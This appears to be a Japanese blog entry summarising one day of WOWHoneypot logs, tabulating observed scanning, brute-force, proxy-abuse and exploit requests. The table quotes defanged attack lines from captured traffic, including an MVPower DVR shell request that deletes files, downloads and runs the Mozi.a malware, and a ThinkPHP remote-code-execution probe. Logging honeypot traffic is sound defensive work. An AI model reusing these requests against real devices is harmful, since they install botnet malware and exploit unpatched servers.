23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(351日目)

2020/03/03(火)

トータルは330件でした。

ハンティングログは以下です。

49.143.32[.]6 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.a

www.virustotal.com

件数 概要 リクエス
234 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
51 アクセス GET /
15 調査 GET /is_test
4 不正中継の調査 GET hxxp[:]//110.249.212.46/testget?q=23333&port=8080
3 phpMyAdminの調査 GET /admin-scripts.asp
2 不正中継の調査 HEAD hxxp[:]//123.125.114.144/
2 不明 GET /hudson
2 不正中継の試み CONNECT www.ipip.net:443
2 不正中継の試み CONNECT www.baidu.com:443
2 不正中継の試み CONNECT ip.ws.126.net:443
2 不正中継の試み CONNECT cn.bing.com:443
1 Strutsの調査 POST /login.action
1 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
1 調査 OPTIONS /
1 不正中継の調査 GET hxxp[:]//www.123cha.com/
1 調査 GET /version
1 MVPower DVRなどの脆弱性を狙った通信 GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
1 phpMyAdminの調査 GET /phpmyadmin/
1 Outlookのログインページの調査 GET /owa/auth/logon.aspx
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 不正中継の試み CONNECT fortnite-public-service-prod11.ol.epicgames.com:443